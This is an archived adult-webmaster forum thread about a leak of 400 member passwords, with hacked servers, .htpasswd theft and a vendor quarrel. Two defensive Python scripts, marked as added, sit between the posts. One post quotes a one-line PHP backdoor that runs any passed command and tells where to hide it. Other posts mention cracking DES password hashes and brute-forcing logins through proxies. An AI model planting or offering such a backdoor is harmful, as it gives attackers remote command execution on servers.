GoFuckYourself.com - Adult Webmaster Forum

How can a password site post 400 of my passwords? (https://gfy.com/showthread.php?t=795814)

aico 12-31-2007 12:20 AM

anyone telling you to change your password protection script has no clue what they are talking about. Warchild and some others were giving you the correct answers.

Robbie 12-31-2007 01:19 AM

I have a clue. And I think that securing your server is of course step ONE. That should be a given. Then if you want to really stop all password trading and brute force attacks after your server is nailed down...then yes, you would want to change over to the phantom frog software. As far as I know it is the only security software of its type. Warchild is giving some very solid advice. But shutting the doors on your server isn't gonna help stop people trading passwords, or stop the hundreds that are already out there, or keep you from the hours of headaches and work that goes with dealing with all that customer support. There is a lot more to what this guy is facing than just server security. Though obviously that should be job number one.

D 12-31-2007 01:24 AM

Using NATS?

Robbie 12-31-2007 01:31 AM

Quote:

Originally Posted by D (Post 13581908)
Using NATS?

That's true. If he's using NATS his passwords are definitely compromised. Another good reason to have a system that blocks them and changes the passwords. And another good reason to listen to Warchild and aico and get the security of the site (including the IP restriction of NATS) up to snuff.
It sucks that there are so many thieves out there and honest hard working people have to watch their backs every second.

Robbie 12-31-2007 01:33 AM

Hey D....I like your sites. I'm gonna sign up and promote them. I can definitely use some hot black girl stuff on my tgp's. Love those big asses. :thumbsup

D 12-31-2007 01:36 AM

Quote:

Originally Posted by Robbie (Post 13581926)
Hey D....I like your sites. I'm gonna sign up and promote them. I can definitely use some hot black girl stuff on my tgp's. Love those big asses. :thumbsup

Cool, man. :) Sign up tonight, and I should push your account through tomorrow. Beyond that, it's pretty straightforward. Let me know if there's anything you need.

Robbie 12-31-2007 01:44 AM

Just finished signing up. That's some funny shit on the Shorty Mac site. A rap for every scene description....pure genius! I love it. :thumbsup

aico 12-31-2007 01:57 AM

I say again, Phantom Frog and Strongbox DO NOT protect your .htpasswd file. All of your 400 passwords are on that site because someone got access to your .htpasswd file, while PF and SB will protect your members area from people using those passwords, they will not, and DID NOT, protect your .htpasswd file, someone hacked your server and is still probably doing so.

loco12 12-31-2007 03:31 AM

Agree that the server must have been exploited by a script. I have contacted tech support and asked them to run a diagnostic on it. Changing all my passwords as well as an added precaution. And also dumping wordpress. The less scripts the better.

V_RocKs 12-31-2007 03:32 AM

I addressed the fact that his server was hacked.

PF is for after this happens... IT DOES HELP!

loco12 12-31-2007 03:39 AM

So if I discover it has been hacked (likely) what is there I can do to make sure it doesn't happen again?

V_RocKs 12-31-2007 05:37 AM

Hire a security guy to show you what to do. And to comb the server for backdoors. Password hackers love to leave ways to get back in.

[ScreaM] 12-31-2007 06:24 AM

Quote:

Originally Posted by V_RocKs (Post 13582343)
Hire a security guy to show you what to do. And to comb the server for backdoors. Password hackers love to leave ways to get back in.

Yes that's some good advice.

Spudstr 12-31-2007 07:14 AM

Quote:

Originally Posted by jeffrey (Post 13580169)
www.phantomfrog.com
I don't get money from posting that, lol.
But I so use them.

With phantom frog even if all your passwords were shared everyone would get blocked so no one that shouldn't have access would get in. And with the automated password recovery the real member can easily get a new password sent to their email instantly so they can log on to your site.

This means you wouldn't have to change the password for 400 users, and they wouldn't have to wait more than a few seconds to finish beating off.

Any programmer with a brain can do what phantomfrog does.

justsexxx 12-31-2007 08:58 AM

Quote:

Originally Posted by aico (Post 13581975)
I say again, Phantom Frog and Strongbox DO NOT protect your .htpasswd file. All of your 400 passwords are on that site because someone got access to your .htpasswd file, while PF and SB will protect your members area from people using those passwords, they will not, and DID NOT, protect your .htpasswd file, someone hacked your server and is still probably doing so.

Just curious, the passwords are encrypted. Is there a way to 'decrypt' them?

cem 12-31-2007 09:11 AM

Quote:

Originally Posted by justsexxx (Post 13582799)
Just curious, the passwords are encrypted. Is there a way to 'decrypt' them?

Yes, there is.

To the topic poster, if you still need any help hit me up.

loco12 12-31-2007 09:36 AM

I have just had the server thoroughly checked and there's no infections at all. I have changed all passwords and am going to remove wordpress as well.

I was hoping to find something so I can solve the problem. Wordpress is being removed this week just in case that's the cause.

Then install Phantom Frog and see what happens. Hopefully it was a case of Wordpress or a hacked password for root, in which case it will be solved.

Michaelious 12-31-2007 09:51 AM

Hope this thing doesn't happen to you again mate

Robbie 12-31-2007 10:09 AM

And for the Wordpress, just get yourself another server....even a piece of crap virtual server, like VRocks said. That way when someone hacks into it they don't have anything important to mess with and you can still run the blog.

Why 12-31-2007 10:47 AM

To help prevent it from happening again try to keep all software (especially scripts) that are on your server as up to date as possible.

I would also recommend having more than one person check your server, as different parties have different ways of checking. I know hackers that can hide stuff on your server in amazing places.

raymor 12-31-2007 01:59 PM

loco12, I think we got an email from you and Ali is responding right now.
In summary, any script anywhere on the server could be exploited by a
hacker to retrieve your password list. PHP scripts tend to be particularly
vulnerable. In brief, what you'll need to do is a standard security check
getting rid of any old, unused scripts or scripts that shouldn't be there at
all, then check for security updates on any scripts that you continue to use.
The idea is to get rid of any means the cracker may have of getting the
password file. This is separate from any protection you might use such as
Strongbox, Password Sentry, Frog, etc. These systems will alert you to the
problem, but they can't patch up other scripts elsewhere on the server that
may allow an attacker to get the file.

Secondly, we'll look at the encryption on the password file so that even if a
cracker DOES get it, it does them no good. justsexxx brought this topic up:

Quote:

Originally Posted by justsexxx (Post 13582799)
Just curious, the passwords are encrypted. Is there a way to 'decrypt' them?

Yes, it's incredibly easy to decrypt the old DES encryption that most people use.
It takes only a few seconds to start getting working passwords. That's why we
strongly recommend modern strong encryption and provide you the tools to do
that. This is of course where the people suggesting Phantom Frog have it totally
backwards - in its recommended configuration using strong encryption, a
Strongbox password file is several million times harder to crack than a
standard Phantom Frog installation. What would take a cracker 14 seconds
with Phantom Frog's normal install would take 181 years with ours.



Quote:

Originally Posted by mrwilson (Post 13580242)
Strongbox can be easily bruteforced using a proxy list and wordlist and many of the bruteforce tools available.

instead of usernames you could perhaps use emails?
or make the username and password longer with #'s and other characters.

Phantomfrog is also recommended...

Wilson, you like to spout your mouth off based on some personal feelings you
have against someone involved with Strongbox, but despite our offer of a
$10,000 reward if you could ever brute force a Strongbox site you don't
come up with the goods. Why is it that you talk so much trash but can't back
it up even when we offer you $10,000 to do so? Perhaps because you have
no idea what you're talking about and just like to make yourself look stupid?
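
A defender-side check related to the point above about old DES-encrypted password files, as an added example that is not part of the original thread or of any product named in it: it classifies each `.htpasswd` entry by hash format so the entries worth re-hashing first stand out. The rating labels and the sample entries are constructed for illustration.

```python
import base64
import hashlib
import re
from collections import Counter, defaultdict

# (name, pattern, rating). Ratings are this example's own labels:
#   ok      = slow, salted hash
#   dated   = salted but fast by current standards
#   replace = unsalted, truncating, or not a hash at all
SCHEMES = [
    ("bcrypt",    re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$"), "ok"),
    ("sha-crypt", re.compile(r"^\$[56]\$"), "ok"),
    ("apr1-md5",  re.compile(r"^\$apr1\$[./A-Za-z0-9]{1,8}\$[./A-Za-z0-9]{22}$"), "dated"),
    ("sha1",      re.compile(r"^\{SHA\}[A-Za-z0-9+/]{27}=$"), "replace"),
    # Traditional crypt(3): 2 salt chars + 11 hash chars; only the first
    # 8 characters of the password take part in the hash.
    ("des-crypt", re.compile(r"^[./A-Za-z0-9]{13}$"), "replace"),
]


def classify(stored):
    """Return (scheme, rating) for the hash field of one .htpasswd line."""
    for name, pattern, rating in SCHEMES:
        if pattern.match(stored):
            return name, rating
    # Shape check only: a 13-character plaintext would look like des-crypt.
    return "unknown-or-plaintext", "replace"


def audit(htpasswd_text):
    findings = []                  # (line_no, user, scheme, rating)
    unsalted = defaultdict(list)   # identical {SHA} value -> users
    for line_no, raw in enumerate(htpasswd_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        user, sep, stored = line.partition(":")
        if not sep or not user:
            findings.append((line_no, user or "?", "malformed", "replace"))
            continue
        scheme, rating = classify(stored)
        findings.append((line_no, user, scheme, rating))
        if scheme == "sha1":
            unsalted[stored].append(user)
    return {
        "findings": findings,
        "counts": Counter(f[2] for f in findings),
        "replace": sorted(f[1] for f in findings if f[3] == "replace"),
        # No salt means equal passwords give equal hashes, visible to anyone
        # holding the file.
        "shared_unsalted": sorted(sorted(u) for u in unsalted.values() if len(u) > 1),
    }


def sha_entry(password):
    """Build a {SHA} entry (base64 of an unsalted SHA-1 digest)."""
    return "{SHA}" + base64.b64encode(hashlib.sha1(password.encode()).digest()).decode()


# Constructed sample: placeholder strings with the right shape, not real hashes
# (except the two {SHA} entries, computed here from a made-up password).
SAMPLE = "\n".join([
    "# members area",
    "alice:abCONSTRUCTED",
    "bob:$apr1$constrct$" + "x" * 22,
    "carol:$2y$10$" + "x" * 53,
    "dave:" + sha_entry("made-up-password"),
    "erin:" + sha_entry("made-up-password"),
    "frank:hunter2",
])

if __name__ == "__main__":
    report = audit(SAMPLE)
    for line_no, user, scheme, rating in report["findings"]:
        print(f"line {line_no}: {user:6} {scheme:22} {rating}")
    print("rehash first:", report["replace"])
    print("same password (unsalted):", report["shared_unsalted"])
```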

Tat2Jr 12-31-2007 02:21 PM

raymor - I've loved Strongbox and your customer service for quite a few years now. Your program beat the hell outta pennywize. I've only been happy with it from day one.

The automatic reissue of a password being emailed to the member, and that geo-ip thing sounds interesting. Any chance of having either of those features added to strongbox in the near future?

V_RocKs 12-31-2007 03:24 PM

How a hacker hides the backdoor.

He writes a SIMPLE PHP script.

Code:

<? if ($cmd) { passthru($cmd); } ?>
Then places said script inside a directory like:

/yourwebsite/galleries/12/4050/script.php

So that it is somewhere you won't find it without basic command line knowledge.
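
A defender-side sweep for the kind of file described in the post above, as an added example that is not part of the original thread: it walks a web root and flags PHP files sitting under directories that should hold only content, and PHP files that pass a variable straight into a command-execution function. The `content_dirs` parameter, the reason labels and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

PHP_EXT = (".php", ".phtml", ".php5")
# A PHP command-execution call, optionally capturing a variable passed as its
# first argument. Text match only, so comments and strings can trigger it.
EXEC_CALL = re.compile(
    rb"\b(passthru|shell_exec|system|exec|popen|proc_open)\s*\(\s*(\$\w+)?", re.I)


def scan_file(path, rel, content_dirs):
    """Return the list of reasons this PHP file deserves a manual look."""
    reasons = []
    # Assumption: directories named in content_dirs hold images/video only.
    if any(part in content_dirs for part in rel.split(os.sep)[:-1]):
        reasons.append("php-in-content-dir")
    with open(path, "rb") as fh:
        data = fh.read(1_000_000)
    calls = list(EXEC_CALL.finditer(data))
    if any(m.group(2) for m in calls):
        reasons.append("exec-call-on-variable")
    elif calls:
        reasons.append("exec-call-literal")
    return reasons


def scan_tree(root, content_dirs):
    """Walk root and return (relative_path, reasons), most reasons first."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXT):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            reasons = scan_file(path, rel, content_dirs)
            if reasons:
                findings.append((rel, reasons))
    return sorted(findings, key=lambda f: (-len(f[1]), f[0]))


def build_sample(root):
    """Write a small constructed site tree under root for the demo."""
    files = {
        "index.php": b'<?php echo "members"; ?>',
        "admin/thumbs.php": b'<?php exec("convert in.jpg -resize 120x120 out.jpg"); ?>',
        "galleries/12/4050/001.jpg": b"\xff\xd8\xff\xe0 constructed",
        # The one-line script quoted in the post, at the path it describes.
        "galleries/12/4050/script.php": b"<? if ($cmd) { passthru($cmd); } ?>",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as root:
        build_sample(root)
        for rel, reasons in scan_tree(root, {"galleries"}):
            print(rel, reasons)
```

A hit is a prompt for manual review, not a verdict: legitimate scripts call `exec()` too, which is why the literal-argument case is reported separately.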

Socks 12-31-2007 03:28 PM

loco: I have a friend who is amazing at unix security, has been programming since he was 6.. often wrote basic code on paper at school.. ;)

He wouldn't be very expensive, and I'd trust him with my home. If you're interested, get in touch and he will make sure your server is "unfucwiddable" as he would say. :)

dial 12-31-2007 03:32 PM

Quote:

Originally Posted by raymor (Post 13584129)
Why is it that you talk so much trash but can't back
it up even when we offer you $10,000 to do so?

because everyone on GFY is ALL talk and no action

most couldn't put up a basic html page without help of dreamweaver or frontpage, much less figure out how to brute force into a server

V_RocKs 01-01-2008 05:09 AM

Actually, someone already posted it.. do a search.

jeffrey 01-01-2008 09:41 AM

Quote:

Originally Posted by raymor (Post 13584129)
That's why we
strongly recommend modern strong encryption and provide you the tools to do
that. This is of course where the people suggesting Phantom Frog have it totally backwards - in its recommended configuration using strong encryption, a
Strongbox password file is several million times harder to crack than a
standard Phantom Frog installation. What would take a cracker 14 seconds
with Phantom Frog's normal install would take 181 years with ours.

See now this is something I don't get.
Even if the PhantomFrog was just plain text only the first person to try would get in, all following attempts would be blocked.
And you say "normal install" a lot. Please back up your statement.




Quote:

Originally Posted by raymor (Post 13584129)
Wilson, you like to spout your mouth off based on some personal feelings you
have against someone involved with Strongbox, but despite our offer of a
$10,000 reward if you could ever brute force a Strongbox site

Show me the server you have set up for someone to brute force and give me a couple days.
Although I know several people that have had some hard core attempts, and I know why it's un brutable, it's because it crashes the server.
I also don't know why your "image verification" is just a rotation of 40 or whatever images, not even a true random image for verification, why is this?

ladida 01-01-2008 12:41 PM

Quote:

Originally Posted by jeffrey (Post 13586736)
Show me the server you have set up for someone to brute force and give me a couple days.

His server is "unbrutable" because the only combo that gets you in is something like "ksl#59basBZkvlmadA:Abj4090bBZ-biadfmkdf" most likely, and that defies the purpose of the bruteforce, since if you ONLY had such logins in your user base, you wouldn't need strongbox (or any fancy brute protection systems like pennywize, frog ...). You could protect that with basic auth (where the speed of tries/sec goes considerably higher than when sending complete data through post) and it would never get bruted. So his challenge is stupid to begin with.

But we all know that users don't have such user/pass combos.

cem 01-01-2008 07:10 PM

Quote:

Originally Posted by raymor (Post 13584129)
loco12, I think we got an email from you and Ali is responding right now.
In summary, any script anywhere on the server could be exploited by a
hacker to retrieve your password list. PHP scripts tend to be particularly
vulnerable. In brief, what you'll need to do is a standard security check
getting rid of any old, unused scripts or scripts that shouldn't be there at
all, then check for security updates on any scripts that you continue to use.
The idea is to get rid of any means the cracker may have of getting the
password file. This is separate from any protection you might use such as
Strongbox, Password Sentry, Frog, etc. These systems will alert you to the
problem, but they can't patch up other scripts elsewhere on the server that
may allow an attacker to get the file.

Secondly, we'll look at the encryption on the password file so that even if a
cracker DOES get it, it does them no good. justsexxx brought this topic up:



Yes, it's incredibly easy to decrypt the old DES encryption that most people use.
It takes only a few seconds to start getting working passwords. That's why we
strongly recommend modern strong encryption and provide you the tools to do
that. This is of course where the people suggesting Phantom Frog have it totally
backwards - in its recommended configuration using strong encryption, a
Strongbox password file is several million times harder to crack than a
standard Phantom Frog installation. What would take a cracker 14 seconds
with Phantom Frog's normal install would take 181 years with ours.





Wilson, you like to spout your mouth off based on some personal feelings you
have against someone involved with Strongbox, but despite our offer of a
$10,000 reward if you could ever brute force a Strongbox site you don't
come up with the goods. Why is it that you talk so much trash but can't back
it up even when we offer you $10,000 to do so? Perhaps because you have
no idea what you're talking about and just like to make yourself look stupid?

Heh, I'll take that $10.000 :1orglaugh I am not bashing or anything, I really love the script you guys have created, it's one of the better bruteforce protection scripts out there. HOWEVER I know for a fact that Strongbox is actually bruteforcable. We weren't sure which script to use for our sites and we were strongly leaning towards Strongbox, however we decided not to do so after some deep research.

What makes you 100% sure that your script is not bruteforcable?

madfuck 01-01-2008 07:38 PM

Idk, But That Is A Good Question Tho ???

raymor 01-01-2008 09:24 PM

Quote:

Originally Posted by V_RocKs (Post 13581724)
BTW.. No matter what you use for password management, it still has to conform to the AOL rule. (x) number of IP's over (y) number of minutes. So it won't magically kill passwords when they are shared individually like in a message board via PM's or in a chatroom.

That was true in 1998. That's why we wrote Strongbox - to have something a
bit smarter than just counting IPs. Strange, it took 9 years for anyone else to
catch on that they needed to do something other than just count IPs. Then
suddenly though Frog had existed years, in 2007 suddenly people heard about
it and now we have TWO systems that aren't completely stupid - Strongbox and
Frog.

raymor 01-01-2008 09:33 PM

Quote:

Originally Posted by darling2 (Post 13581006)
is it possible to configure strongbox to automatically reset password and send out new passwords to members?

Yes, it is. We just don't promote that because we think it's a BAD idea for
most webmasters. For huge sites with thousands of members the
customer service workload might be such that it makes sense, but for most
it doesn't make sense automatically to give someone a new password after
they've already given theirs out. With our recommended configuration, you can
almost guarantee that any compromised passwords were given out by the
member, so the webmaster may want to use some judgement in giving out
new ones.

When we set up such a system for a webmaster who insisted on trying it,
we found that indeed people would keep giving out their passwords every time
one got caught if you do a "dumb" system like Frog has. So before promoting
such a thing we're waiting until we're done developing an intelligent
system that isn't open to this kind of abuse.

raymor 01-01-2008 09:41 PM

Quote:

Originally Posted by Tat2Jr (Post 13584234)
raymor - I've loved Strongbox and your customer service for quite a few years now. Your program beat the hell outta pennywize. I've only been happy with it from day one.

The automatic reissue of a password being emailed to the member, and that geo-ip thing sounds interesting. Any chance of having either of those features added to strongbox in the near future?


Password mailed to member exists, but is currently lacking in intelligence,
it just emails new passwords like Phantom Frog does. We think that's a BAD
idea for most webmasters. We're currently developing a more intelligent
system as part of Strongbox 4.0, to be released soon.

Regarding geo-ip, as you may know, Strongbox was the first such system to
use any kind of geo-ip. Country based geo-ip seems to work quite well,
possibly better than Frog's assumption that the database can be trusted to be
more specific than that although the company who makes the database says
it's wrong as much as 40% of the time, depending on the region. However,
Frog's "feature" is great marketing since most webmasters don't realize it's
based on an admittedly inaccurate database, so in Strongbox 4.0 we're blending
both approaches. Whereas Frog RELIES on the database being more accurate
than its creators claim, Strongbox 4.0 will CONSIDER the more specific geo-ip
information ALONG WITH other factors including basic bio-metric indicators
which look at the person on the other side of the monitor.

raymor 01-01-2008 09:46 PM

Quote:

Originally Posted by ladida (Post 13587502)
His server is "unbrutable" because the only combo that gets you in is something like "ksl#59basBZkvlmadA:Abj4090bBZ-biadfmkdf" most likely, and that defies the purpose of the bruteforce, since if you ONLY had such logins in your user base, you wouldn't need strongbox (or any fancy brute protection systems like pennywize, frog ...). You could protect that with basic auth (where the speed of tries/sec goes considerably higher than when sending complete data through post) and it would never get bruted. So his challenge is stupid to begin with.

But we all know that users don't have such user/pass combos.

Nothing could be further from the truth. Geez, why does everyone who has
absolutely no clue what they are talking about feel the need to post as though
they do? Actually we set up the test server EXACTLY the same way as we
do any other site. The user names and passwords are short, memorable
passwords generated from our publicly available tool that you can use even
without Strongbox. It's used many times per day by many webmasters.
Have you even bothered to browse our web site before making up total BS to post?

raymor 01-01-2008 09:51 PM

Seriously, people, before you post any more total crap about Strongbox
take five or ten minutes to at least look at the site even if you aren't going to
do something strange like say look at the actual product before posting
about it.

Actually, come to think of it, taking five minutes to get their facts straight
is too much to ask of people who argue on the internet. I know that.
Let me suggest something simpler that takes only three seconds - when you
DO post, just be honest by including the sentence "I've never seen Strongbox
and so have no idea what I'm talking about".

Arguing on the internet is like competing in the Special Olympics -
even if you "win" you're still a retard.

raymor 01-01-2008 10:18 PM

Quote:

Originally Posted by jeffrey (Post 13586736)
See now this is something I don't get.
Even if the PhantomFrog was just plain text only the first person to try would get in, all following attempts would be blocked.

Indeed all of the user names would quickly be blocked and no one could
get in, which is pretty much the subject of this thread. The idea with our
approach is to make sure that they don't get blocked because they don't get out.
You are correct, with a typical Phantom Frog install all the user names would
be blocked. We think it's better if the paying customers are able to log in to
your site.

Quote:

Originally Posted by jeffrey (Post 13586736)
And you say "normal install" a lot. Please back up your statement.

I'm not sure what you mean by "backing up" a reference to a "normal install"
of PF, Pennywize, Proxypass, etc. as opposed to some special installation they
may have done once that's different from the way they normally do things.
As a computer science person, I'm very precise in my language.
We install and develop Strongbox all day everyday, we don't spend all that
time looking at the "competition", so I don't know the details of every installation
they've ever done. Therefore I can't say that "Proxypass always ..." or
"Frog always ... ". I can only compare our approach to what others NORMALLY
do. For example Phantom Frog is NORMALLY extremely strict. They normally
focus more than we do on trying to catch every compromised password the
first time, at the expense of accidentally blocking a lot more legitimate members.
We normally use settings that are more geared to making sure that paying
members can get in OK, knowing that the variety of factors we consider will
catch almost all compromised passwords pretty quickly. Strongbox COULD
be set up to be super strict, like Phantom Frog is, and perhaps Frog COULD
be set up to be more lenient, but it's useful to talk about how they are
NORMALLY installed. Thus I say that Phantom Frog will NORMALLY block more
legitimate members in an attempt to block compromised passwords more
quickly than Strongbox NORMALLY does.


Quote:

Originally Posted by jeffrey (Post 13586736)
Show me the server you have set up for someone to brute force and
give me a couple days.

I'll be glad to set up a test server for you and send you that information.
Just shoot me an email and I'll send you some specifics.
You DO intend to try something special that might actually work, right?
This isn't 1996 and a dumb brute force would just be a huge waste of time.
When we posted the $10,000 on the cracker forums we had a couple of
guys claiming they had some exploit they wanted to test out and it later
turned out all they had was a list of 10,000 proxies. PULEAZE! Spreading
requests like that isn't going to get you anywhere close. Most of those will
probably already be in our database which includes hundreds of thousands
of open proxies and any that aren't in the database will be detected by our live
detection. So anyway, yeah, just email me and I'll set it up for you.


Quote:

Originally Posted by jeffrey (Post 13586736)
I also don't know why your "image verification" is just a rotation of 40 or whatever images, not even a true random image for verification, why is this?

There are a lot more than 40 words in our dictionary.
We use words rather than random characters because random
characters are really fucking annoying for the customer.

Tat2Jr 01-01-2008 11:15 PM

Quote:

Originally Posted by raymor (Post 13589253)
Password mailed to member exists, but is currently lacking in intelligence,
it just emails new passwords like Phantom Frog does. We think that's a BAD
idea for most webmasters. We're currently developing a more intelligent
system as part of Strongbox 4.0, to be released soon.

Regarding geo-ip, as you may know, Strongbox was the first such system to
use any kind of geo-ip. Country based geo-ip seems to work quite well,
possibly better than Frog's assumption that the database can be trusted to be
more specific than that although the company who makes the database says
it's wrong as much as 40% of the time, depending on the region. However,
Frog's "feature" is great marketing since most webmasters don't realize it's
based on an admittedly inaccurate database, so in Strongbox 4.0 we're blending
both approaches. Whereas Frog RELIES on the database being more accurate
than its creators claim, Strongbox 4.0 will CONSIDER the more specific geo-ip
information ALONG WITH other factors including basic bio-metric indicators
which look at the person on the other side of the monitor.


Thanks for the reply. I'm so looking forward to Strongbox 4! I've got some new sites going online soon, and will want my old ones updated to the latest version too! I've loved strongbox since the day it was installed. No monthly fees, and works as promised. Haven't had a huge unexpected server bill since.

raymor 01-01-2008 11:24 PM

Quote:

Originally Posted by cem (Post 13588722)
What makes you 100% sure that your script is not bruteforcable?

Well as far as actually brute force that's simple math. You'd need millions
of proxies and hundreds of servers managing those millions of proxies.
Just do the math. Common sense tells us that no hacker has millions of
proxies at his disposal. Even if a single cracker controlled ALL Windows
Vista or Windows XP machines on the planet it wouldn't be enough.

Now some other attack besides brute force is another question, and one that
can't be simply answered with ten minutes of simple arithmetic. We wanted to
be sure that Strongbox couldn't be penetrated any other way, and that is
of course the reason we posted the $10,000 offer on all the big hacker boards
way back when. Some really bright hackers made some valiant efforts and
none succeeded, so I'm now pretty confident about Strongbox. That's not to
say it couldn't ever happen, but all of the big name hackers pretty much give
the same answer when asked how to get past Strongbox - they tried it, they
failed, so go find a Pennywize site with similar content. Of course at the time
I went all over the hacker boards with the offer I could actually AFFORD to pay
$10,000 to a smart bright hacker who pointed out a weakness. :) It would be a
pretty big hit to take today. I'll still stick by it with these smartasses on GFY,
but I'm no longer going around taunting the top hackers with the offer. ;)

One hacker who asked that I not reveal his name DID find HALF of a possible
attack vector - not anything he could actually use, but something that would
get you half way there to getting past one of our security measures, then he
postulated that if he were able to complete that attack and also find some way
around another of our security measures, it would then become a brute force
type of situation. We of course patched that up real quick and that's been
taken care of for quite some time now.

ladida 01-02-2008 05:51 AM

Lol. It's stupid arguing with you so I'll stop right here. I've seen you argue with other people, you just reiterate same shit. You have too high estimate of yourself while in fact you can't even keep your server safe, so keep talking the talk. Your software is weak, whether you admit it or not.
And your "big hacker boards" = you googled for "xxx password" and similar bullshit and advertised there. You've never seen a hacker board in your life. It's the same bullshit you're selling to your customers on the "active spider" plan. All those password boards are run by webmasters anyway. And your "proxy database" rofl, same thing. Keep marketing tho

jeffrey 01-02-2008 06:26 AM

Quote:

Originally Posted by raymor (Post 13589228)
When we set up such a system for a webmaster who insisted on trying it,
we found that indeed people would keep giving out their passwords every time
one got caught if you do a "dumb" system like Frog has. So before promoting
such a thing we're waiting until we're done developing an intelligent
system that isn't open to this kind of abuse.

I have noticed that after the user has requested a new password be automatically emailed to them that there isn't any unauthorized people using that pass for several days. There are people attempting with the old pass, but not getting in.
Then a few days later maybe someone else will attempt to get in... but here is the best part, they still can't get in.

SB will let 4-5 completely different people in every single day as long as the member name is active.
How is that better?

Quote:

Originally Posted by raymor (Post 13589253)
Password mailed to member exists, but is currently lacking in intelligence,
it just emails new passwords like Phantom Frog does. We think that's a BAD
idea for most webmasters. We're currently developing a more intelligent
system as part of Strongbox 4.0, to be released soon.

Regarding geo-ip, as you may know, Strongbox was the first such system to
use any kind of geo-ip. Country based geo-ip seems to work quite well,
possibly better than Frog's assumption that the database can be trusted to be
more specific than that although the company who makes the database says
it's wrong as much as 40% of the time, depending on the region. However,
Frog's "feature" is great marketing since most webmasters don't realize it's
based on an admittedly inaccurate database, so in Strongbox 4.0 we're blending
both approaches. Whereas Frog RELIES on the database being more accurate
than its creators claim, Strongbox 4.0 will CONSIDER the more specific geo-ip
information ALONG WITH other factors including basic bio-metric indicators
which look at the person on the other side of the monitor.

The user has to request the pass be automatically emailed to them, it doesn't just get mailed out the moment it's been blocked.

Also about the accuracy of the Geoip DB, this is a quote straight from the geoip database site.
"Over 99% accurate on a country level, 85% accurate on a state level, 80% accurate for the US within a 25 mile radius."

That's slightly better than the 40% you claim.
Frog also does not only rely on geoip.

Quote:

Originally Posted by raymor (Post 13589360)
You are correct, with a typical Phantom Frog install all the user names would
be blocked. We think it's better if the paying customers are able to log in to
your site.


For example Phantom Frog is NORMALLY extremely strict. They normally
focus more than we do on trying to catch every compromised password the
first time, at the expense of accidentally blocking a lot more legitimate members.

There are a lot more than 40 words in our dictionary.
We use words rather than random characters because random
characters are really fucking annoying for the customer.

If a legit member is blocked they can very easily get a new password instantly to their email, resulting in the member staying happy.
SB can't block more because then you would have more people pissed they can't log in for hours and hours while they wait for the webmaster to reissue a new one for them. That is if they ask in the first place and don't just cancel their membership.
Automation is a good thing.

40.... 100 same difference. It's still a HUGE pain in the ass, and really fucking annoying for the customer.



I always find it odd in threads where it comes down to SB and PF you feel you need to bash PF more than just back up your own program.


All times are GMT -7.